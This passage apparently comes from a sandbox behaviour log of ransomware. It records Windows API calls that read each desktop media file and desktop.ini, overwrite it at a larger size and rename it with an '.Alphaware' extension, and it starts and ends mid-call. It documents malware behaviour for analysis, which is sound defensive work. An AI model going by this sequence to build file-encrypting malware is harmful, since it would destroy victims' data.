(lpExistingFileName="C:\\Users\\kEecfMwgj\\Desktop\\6XFeOIrP-7F1BPJ.mp3" (normalized: "c:\\users\\keecfmwgj\\desktop\\6xfeoirp-7f1bpj.mp3"), lpNewFileName="C:\\Users\\kEecfMwgj\\Desktop\\6XFeOIrP-7F1BPJ.mp3.Alphaware" (normalized: "c:\\users\\keecfmwgj\\desktop\\6xfeoirp-7f1bpj.mp3.alphaware")) returned 1 [0079.959] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\8-6P.wav", dwFileAttributes=0x80) returned 1 [0079.960] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e9f8) returned 1 [0079.960] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\8-6P.wav" (normalized: "c:\\users\\keecfmwgj\\desktop\\8-6p.wav"), fInfoLevelId=0x0, lpFileInformation=0x25ea108 | out: lpFileInformation=0x25ea108*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x92de0080, ftCreationTime.dwHighDateTime=0x1d97379, ftLastAccessTime.dwLowDateTime=0x699b1a00, ftLastAccessTime.dwHighDateTime=0x1d97531, ftLastWriteTime.dwLowDateTime=0x699b1a00, ftLastWriteTime.dwHighDateTime=0x1d97531, nFileSizeHigh=0x0, nFileSizeLow=0x18cb1)) returned 1 [0079.960] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e9a8) returned 1 [0079.960] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23ea88) returned 1 [0079.960] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\8-6P.wav" (normalized: "c:\\users\\keecfmwgj\\desktop\\8-6p.wav"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x254 [0079.960] GetFileType (hFile=0x254) returned 0x1 [0079.961] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e9f8) returned 1 [0079.961] GetFileType (hFile=0x254) returned 0x1 [0079.961] GetFileSize (in: hFile=0x254, lpFileSizeHigh=0x23ec08 | out: lpFileSizeHigh=0x23ec08*=0x0) returned 0x18cb1 [0079.961] ReadFile (in: hFile=0x254, lpBuffer=0x1273a5d0, nNumberOfBytesToRead=0x18cb1, lpNumberOfBytesRead=0x23eb38, lpOverlapped=0x0 | out: lpBuffer=0x1273a5d0*, lpNumberOfBytesRead=0x23eb38*=0x18cb1, lpOverlapped=0x0) returned 1 [0079.963] CloseHandle (hObject=0x254) returned 1 [0079.995] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e9b8) returned 1 [0079.995] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\8-6P.wav" (normalized: "c:\\users\\keecfmwgj\\desktop\\8-6p.wav"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x254 [0080.012] GetFileType (hFile=0x254) returned 0x1 [0080.012] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e928) returned 1 [0080.012] GetFileType (hFile=0x254) returned 0x1 [0080.017] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e928) returned 1 [0080.017] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\8-6P.wav" (normalized: "c:\\users\\keecfmwgj\\desktop\\8-6p.wav"), fInfoLevelId=0x0, lpFileInformation=0x23ec50 | out: lpFileInformation=0x23ec50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x92de0080, ftCreationTime.dwHighDateTime=0x1d97379, ftLastAccessTime.dwLowDateTime=0x699b1a00, ftLastAccessTime.dwHighDateTime=0x1d97531, ftLastWriteTime.dwLowDateTime=0x81e52da0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x211c8)) returned 1 [0080.017] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e8d8) returned 1 [0080.017] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Desktop\\8-6P.wav" (normalized: "c:\\users\\keecfmwgj\\desktop\\8-6p.wav"), lpNewFileName="C:\\Users\\kEecfMwgj\\Desktop\\8-6P.wav.Alphaware" (normalized: "c:\\users\\keecfmwgj\\desktop\\8-6p.wav.alphaware")) returned 1 [0080.021] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\9g0 rDMpBlzVC.swf", dwFileAttributes=0x80) returned 1 [0080.021] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e9f8) returned 1 [0080.021] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\9g0 rDMpBlzVC.swf" (normalized: "c:\\users\\keecfmwgj\\desktop\\9g0 rdmpblzvc.swf"), fInfoLevelId=0x0, lpFileInformation=0x2668088 | out: lpFileInformation=0x2668088*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x4e2bccb0, ftCreationTime.dwHighDateTime=0x1d97225, ftLastAccessTime.dwLowDateTime=0xd06c8650, ftLastAccessTime.dwHighDateTime=0x1d9744c, ftLastWriteTime.dwLowDateTime=0xd06c8650, ftLastWriteTime.dwHighDateTime=0x1d9744c, nFileSizeHigh=0x0, nFileSizeLow=0xf64d)) returned 1 [0080.021] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e9a8) returned 1 [0080.022] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23ea88) returned 1 [0080.022] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\9g0 rDMpBlzVC.swf" (normalized: "c:\\users\\keecfmwgj\\desktop\\9g0 rdmpblzvc.swf"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x254 [0080.022] GetFileType (hFile=0x254) returned 0x1 [0080.022] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e9f8) returned 1 [0080.022] GetFileType (hFile=0x254) returned 0x1 [0080.022] GetFileSize (in: hFile=0x254, lpFileSizeHigh=0x23ec08 | out: lpFileSizeHigh=0x23ec08*=0x0) returned 0xf64d [0080.024] ReadFile (in: hFile=0x254, lpBuffer=0x26682e0, nNumberOfBytesToRead=0xf64d, lpNumberOfBytesRead=0x23eb38, lpOverlapped=0x0 | out: lpBuffer=0x26682e0*, lpNumberOfBytesRead=0x23eb38*=0xf64d, lpOverlapped=0x0) returned 1 [0080.025] CloseHandle (hObject=0x254) returned 1 [0080.075] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e9b8) returned 1 [0080.075] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\9g0 rDMpBlzVC.swf" (normalized: "c:\\users\\keecfmwgj\\desktop\\9g0 rdmpblzvc.swf"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x254 [0080.077] GetFileType (hFile=0x254) returned 0x1 [0080.077] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e928) returned 1 [0080.077] GetFileType (hFile=0x254) returned 0x1 [0080.081] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e928) returned 1 [0080.082] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\9g0 rDMpBlzVC.swf" (normalized: "c:\\users\\keecfmwgj\\desktop\\9g0 rdmpblzvc.swf"), fInfoLevelId=0x0, lpFileInformation=0x23ec50 | out: lpFileInformation=0x23ec50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4e2bccb0, ftCreationTime.dwHighDateTime=0x1d97225, ftLastAccessTime.dwLowDateTime=0xd06c8650, ftLastAccessTime.dwHighDateTime=0x1d9744c, ftLastWriteTime.dwLowDateTime=0x81eeb320, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x14934)) returned 1 [0080.082] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e8d8) returned 1 [0080.082] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Desktop\\9g0 rDMpBlzVC.swf" (normalized: "c:\\users\\keecfmwgj\\desktop\\9g0 rdmpblzvc.swf"), lpNewFileName="C:\\Users\\kEecfMwgj\\Desktop\\9g0 rDMpBlzVC.swf.Alphaware" (normalized: "c:\\users\\keecfmwgj\\desktop\\9g0 rdmpblzvc.swf.alphaware")) returned 1 [0080.083] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\c-jf 0ya1RIcN.mp4", dwFileAttributes=0x80) returned 1 [0080.084] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e9f8) returned 1 [0080.084] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\c-jf 0ya1RIcN.mp4" (normalized: "c:\\users\\keecfmwgj\\desktop\\c-jf 0ya1ricn.mp4"), fInfoLevelId=0x0, lpFileInformation=0x2725998 | out: lpFileInformation=0x2725998*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x852fa510, ftCreationTime.dwHighDateTime=0x1d96d25, ftLastAccessTime.dwLowDateTime=0xff631450, ftLastAccessTime.dwHighDateTime=0x1d96d68, ftLastWriteTime.dwLowDateTime=0xff631450, ftLastWriteTime.dwHighDateTime=0x1d96d68, nFileSizeHigh=0x0, nFileSizeLow=0x8f34)) returned 1 [0080.084] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e9a8) returned 1 [0080.084] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23ea88) returned 1 [0080.084] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\c-jf 0ya1RIcN.mp4" (normalized: "c:\\users\\keecfmwgj\\desktop\\c-jf 0ya1ricn.mp4"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x254 [0080.085] GetFileType (hFile=0x254) returned 0x1 [0080.085] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e9f8) returned 1 [0080.085] GetFileType (hFile=0x254) returned 0x1 [0080.085] GetFileSize (in: hFile=0x254, lpFileSizeHigh=0x23ec08 | out: lpFileSizeHigh=0x23ec08*=0x0) returned 0x8f34 [0080.086] ReadFile (in: hFile=0x254, lpBuffer=0x2725bf0, nNumberOfBytesToRead=0x8f34, lpNumberOfBytesRead=0x23eb38, lpOverlapped=0x0 | out: lpBuffer=0x2725bf0*, lpNumberOfBytesRead=0x23eb38*=0x8f34, lpOverlapped=0x0) returned 1 [0080.087] CloseHandle (hObject=0x254) returned 1 [0080.125] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e9b8) returned 1 [0080.125] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\c-jf 0ya1RIcN.mp4" (normalized: "c:\\users\\keecfmwgj\\desktop\\c-jf 0ya1ricn.mp4"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x254 [0080.126] GetFileType (hFile=0x254) returned 0x1 [0080.126] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e928) returned 1 [0080.126] GetFileType (hFile=0x254) returned 0x1 [0080.129] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e928) returned 1 [0080.129] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\c-jf 0ya1RIcN.mp4" (normalized: "c:\\users\\keecfmwgj\\desktop\\c-jf 0ya1ricn.mp4"), fInfoLevelId=0x0, lpFileInformation=0x23ec50 | out: lpFileInformation=0x23ec50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x852fa510, ftCreationTime.dwHighDateTime=0x1d96d25, ftLastAccessTime.dwLowDateTime=0xff631450, ftLastAccessTime.dwHighDateTime=0x1d96d68, ftLastWriteTime.dwLowDateTime=0x81f5d740, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0xbfc8)) returned 1 [0080.129] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e8d8) returned 1 [0080.129] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Desktop\\c-jf 0ya1RIcN.mp4" (normalized: "c:\\users\\keecfmwgj\\desktop\\c-jf 0ya1ricn.mp4"), lpNewFileName="C:\\Users\\kEecfMwgj\\Desktop\\c-jf 0ya1RIcN.mp4.Alphaware" (normalized: "c:\\users\\keecfmwgj\\desktop\\c-jf 0ya1ricn.mp4.alphaware")) returned 1 [0080.131] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\cZ6ivAAtP9f8.m4a", dwFileAttributes=0x80) returned 1 [0080.131] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e9f8) returned 1 [0080.131] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\cZ6ivAAtP9f8.m4a" (normalized: "c:\\users\\keecfmwgj\\desktop\\cz6ivaatp9f8.m4a"), fInfoLevelId=0x0, lpFileInformation=0x2471888 | out: lpFileInformation=0x2471888*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x2618a290, ftCreationTime.dwHighDateTime=0x1d96e09, ftLastAccessTime.dwLowDateTime=0x2bbd27c0, ftLastAccessTime.dwHighDateTime=0x1d96f94, ftLastWriteTime.dwLowDateTime=0x2bbd27c0, ftLastWriteTime.dwHighDateTime=0x1d96f94, nFileSizeHigh=0x0, nFileSizeLow=0xfa6b)) returned 1 [0080.131] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e9a8) returned 1 [0080.132] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23ea88) returned 1 [0080.132] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\cZ6ivAAtP9f8.m4a" (normalized: "c:\\users\\keecfmwgj\\desktop\\cz6ivaatp9f8.m4a"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x254 [0080.132] GetFileType (hFile=0x254) returned 0x1 [0080.132] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e9f8) returned 1 [0080.132] GetFileType (hFile=0x254) returned 0x1 [0080.132] GetFileSize (in: hFile=0x254, lpFileSizeHigh=0x23ec08 | out: lpFileSizeHigh=0x23ec08*=0x0) returned 0xfa6b [0080.132] ReadFile (in: hFile=0x254, lpBuffer=0x2471ad0, nNumberOfBytesToRead=0xfa6b, lpNumberOfBytesRead=0x23eb38, lpOverlapped=0x0 | out: lpBuffer=0x2471ad0*, lpNumberOfBytesRead=0x23eb38*=0xfa6b, lpOverlapped=0x0) returned 1 [0080.134] CloseHandle (hObject=0x254) returned 1 [0080.156] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e9b8) returned 1 [0080.156] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\cZ6ivAAtP9f8.m4a" (normalized: "c:\\users\\keecfmwgj\\desktop\\cz6ivaatp9f8.m4a"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x254 [0080.158] GetFileType (hFile=0x254) returned 0x1 [0080.158] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e928) returned 1 [0080.158] GetFileType (hFile=0x254) returned 0x1 [0080.161] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e928) returned 1 [0080.161] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\cZ6ivAAtP9f8.m4a" (normalized: "c:\\users\\keecfmwgj\\desktop\\cz6ivaatp9f8.m4a"), fInfoLevelId=0x0, lpFileInformation=0x23ec50 | out: lpFileInformation=0x23ec50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2618a290, ftCreationTime.dwHighDateTime=0x1d96e09, ftLastAccessTime.dwLowDateTime=0x2bbd27c0, ftLastAccessTime.dwHighDateTime=0x1d96f94, ftLastWriteTime.dwLowDateTime=0x81fa9a00, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x14eb4)) returned 1 [0080.161] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e8d8) returned 1 [0080.162] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Desktop\\cZ6ivAAtP9f8.m4a" (normalized: "c:\\users\\keecfmwgj\\desktop\\cz6ivaatp9f8.m4a"), lpNewFileName="C:\\Users\\kEecfMwgj\\Desktop\\cZ6ivAAtP9f8.m4a.Alphaware" (normalized: "c:\\users\\keecfmwgj\\desktop\\cz6ivaatp9f8.m4a.alphaware")) returned 1 [0080.163] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\desktop.ini", dwFileAttributes=0x80) returned 1 [0080.164] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e9f8) returned 1 [0080.164] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\desktop.ini" (normalized: "c:\\users\\keecfmwgj\\desktop\\desktop.ini"), fInfoLevelId=0x0, lpFileInformation=0x252edc8 | out: lpFileInformation=0x252edc8*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x7996bf30, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7996bf30, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7e7f4710, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x11a)) returned 1 [0080.164] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e9a8) returned 1 [0080.164] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23ea88) returned 1 [0080.164] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\desktop.ini" (normalized: "c:\\users\\keecfmwgj\\desktop\\desktop.ini"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x254 [0080.164] GetFileType (hFile=0x254) returned 0x1 [0080.164] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e9f8) returned 1 [0080.165] GetFileType (hFile=0x254) returned 0x1 [0080.165] GetFileSize (in: hFile=0x254, lpFileSizeHigh=0x23ec08 | out: lpFileSizeHigh=0x23ec08*=0x0) returned 0x11a [0080.165] ReadFile (in: hFile=0x254, lpBuffer=0x252f118, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x23eb38, lpOverlapped=0x0 | out: lpBuffer=0x252f118*, lpNumberOfBytesRead=0x23eb38*=0x11a, lpOverlapped=0x0) returned 1 [0080.166] CloseHandle (hObject=0x254) returned 1 [0080.200] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e9b8) returned 1 [0080.200] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\desktop.ini" (normalized: "c:\\users\\keecfmwgj\\desktop\\desktop.ini"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x254 [0080.202] GetFileType (hFile=0x254) returned 0x1 [0080.202] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e928) returned 1 [0080.202] GetFileType (hFile=0x254) returned 0x1 [0080.204] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e928) returned 1 [0080.204] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\desktop.ini" (normalized: "c:\\users\\keecfmwgj\\desktop\\desktop.ini"), fInfoLevelId=0x0, lpFileInformation=0x23ec50 | out: lpFileInformation=0x23ec50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7996bf30, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7996bf30, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x8201be20, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x248)) returned 1 [0080.204] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e8d8) returned 1 [0080.204] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Desktop\\desktop.ini" (normalized: "c:\\users\\keecfmwgj\\desktop\\desktop.ini"), lpNewFileName="C:\\Users\\kEecfMwgj\\Desktop\\desktop.ini.Alphaware" (normalized: "c:\\users\\keecfmwgj\\desktop\\desktop.ini.alphaware")) returned 1 [0080.206] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\ELJrj3fRtgYOpT3c_m.mp4", dwFileAttributes=0x80) returned 1 [0080.206] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e9f8) returned 1 [0080.206] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\ELJrj3fRtgYOpT3c_m.mp4" (normalized: "c:\\users\\keecfmwgj\\desktop\\eljrj3frtgyopt3c_m.mp4"), fInfoLevelId=0x0, lpFileInformation=0x25ae6e0 | out: lpFileInformation=0x25ae6e0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x804bb920, ftCreationTime.dwHighDateTime=0x1d972df, ftLastAccessTime.dwLowDateTime=0x1e323290, ftLastAccessTime.dwHighDateTime=0x1d97614, ftLastWriteTime.dwLowDateTime=0x1e323290, ftLastWriteTime.dwHighDateTime=0x1d97614, nFileSizeHigh=0x0, nFileSizeLow=0x6b61)) returned 1 [0080.208] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e9a8) returned 1 [0080.208] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23ea88) returned 1 [0080.208] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\ELJrj3fRtgYOpT3c_m.mp4" (normalized: "c:\\users\\keecfmwgj\\desktop\\eljrj3frtgyopt3c_m.mp4"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x254 [0080.208] GetFileType (hFile=0x254) returned 0x1 [0080.208] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e9f8) returned 1 [0080.208] GetFileType (hFile=0x254) returned 0x1 [0080.208] GetFileSize (in: hFile=0x254, lpFileSizeHigh=0x23ec08 | out: lpFileSizeHigh=0x23ec08*=0x0) returned 0x6b61 [0080.209] ReadFile (in: hFile=0x254, lpBuffer=0x25ae958, nNumberOfBytesToRead=0x6b61, lpNumberOfBytesRead=0x23eb38, lpOverlapped=0x0 | out: lpBuffer=0x25ae958*, lpNumberOfBytesRead=0x23eb38*=0x6b61, lpOverlapped=0x0) returned 1 [0080.210] CloseHandle (hObject=0x254) returned 1 [0080.237] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e9b8) returned 1 [0080.237] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\ELJrj3fRtgYOpT3c_m.mp4" (normalized: "c:\\users\\keecfmwgj\\desktop\\eljrj3frtgyopt3c_m.mp4"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x254 [0080.239] GetFileType (hFile=0x254) returned 0x1 [0080.239] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e928) returned 1 [0080.239] GetFileType (hFile=0x254) returned 0x1 [0080.248] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e928) returned 1 [0080.248] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\ELJrj3fRtgYOpT3c_m.mp4" (normalized: "c:\\users\\keecfmwgj\\desktop\\eljrj3frtgyopt3c_m.mp4"), fInfoLevelId=0x0, lpFileInformation=0x23ec50 | out: lpFileInformation=0x23ec50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x804bb920, ftCreationTime.dwHighDateTime=0x1d972df, ftLastAccessTime.dwLowDateTime=0x1e323290, ftLastAccessTime.dwHighDateTime=0x1d97614, ftLastWriteTime.dwLowDateTime=0x820680e0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x9008)) returned 1 [0080.248] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e8d8) returned 1 [0080.248] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Desktop\\ELJrj3fRtgYOpT3c_m.mp4" (normalized: "c:\\users\\keecfmwgj\\desktop\\eljrj3frtgyopt3c_m.mp4"), lpNewFileName="C:\\Users\\kEecfMwgj\\Desktop\\ELJrj3fRtgYOpT3c_m.mp4.Alphaware" (normalized: "c:\\users\\keecfmwgj\\desktop\\eljrj3frtgyopt3c_m.mp4.alphaware")) returned 1 [0080.250] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\fWyG0v4r7aIxC.gif", dwFileAttributes=0x80) returned 1 [0080.251] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e9f8) returned 1 [0080.251] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\fWyG0v4r7aIxC.gif" (normalized: "c:\\users\\keecfmwgj\\desktop\\fwyg0v4r7aixc.gif"), fInfoLevelId=0x0, lpFileInformation=0x247d620 | out: lpFileInformation=0x247d620*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x9df57b0, ftCreationTime.dwHighDateTime=0x1d9684e, ftLastAccessTime.dwLowDateTime=0xcd8c2700, ftLastAccessTime.dwHighDateTime=0x1d96ddb, ftLastWriteTime.dwLowDateTime=0xcd8c2700, ftLastWriteTime.dwHighDateTime=0x1d96ddb, nFileSizeHigh=0x0, nFileSizeLow=0x17d91)) returned 1 [0080.251] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e9a8) returned 1 [0080.251] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\fWyG0v4r7aIxC.gif", nBufferLength=0x105, lpBuffer=0x23e570, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Desktop\\fWyG0v4r7aIxC.gif", lpFilePart=0x0) returned 0x2c [0080.251] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23ea88) returned 1 [0080.251] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\fWyG0v4r7aIxC.gif" (normalized: "c:\\users\\keecfmwgj\\desktop\\fwyg0v4r7aixc.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x254 [0080.251] GetFileType (hFile=0x254) returned 0x1 [0080.252] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e9f8) returned 1 [0080.252] GetFileType (hFile=0x254) returned 0x1 [0080.252] GetFileSize (in: hFile=0x254, lpFileSizeHigh=0x23ec08 | out: lpFileSizeHigh=0x23ec08*=0x0) returned 0x17d91 [0080.252] ReadFile (in: hFile=0x254, lpBuffer=0x12967670, nNumberOfBytesToRead=0x17d91, lpNumberOfBytesRead=0x23eb38, lpOverlapped=0x0 | out: lpBuffer=0x12967670*, lpNumberOfBytesRead=0x23eb38*=0x17d91, lpOverlapped=0x0) returned 1 [0080.254] CloseHandle (hObject=0x254) returned 1 [0080.278] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e9b8) returned 1 [0080.278] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\fWyG0v4r7aIxC.gif" (normalized: "c:\\users\\keecfmwgj\\desktop\\fwyg0v4r7aixc.gif"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x254 [0080.280] GetFileType (hFile=0x254) returned 0x1 [0080.280] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e928) returned 1 [0080.280] GetFileType (hFile=0x254) returned 0x1 [0080.281] WriteFile (in: hFile=0x254, lpBuffer=0x24f9f48*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea98, lpOverlapped=0x0 | out: lpBuffer=0x24f9f48*, lpNumberOfBytesWritten=0x23ea98*=0x1000, lpOverlapped=0x0) returned 1 [0080.282] WriteFile (in: hFile=0x254, lpBuffer=0x24f9f48*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea98, lpOverlapped=0x0 | out: lpBuffer=0x24f9f48*, lpNumberOfBytesWritten=0x23ea98*=0x1000, lpOverlapped=0x0) returned 1 [0080.282] WriteFile (in: hFile=0x254, lpBuffer=0x24f9f48*, nNumberOfBytesToWrite=0x1000, 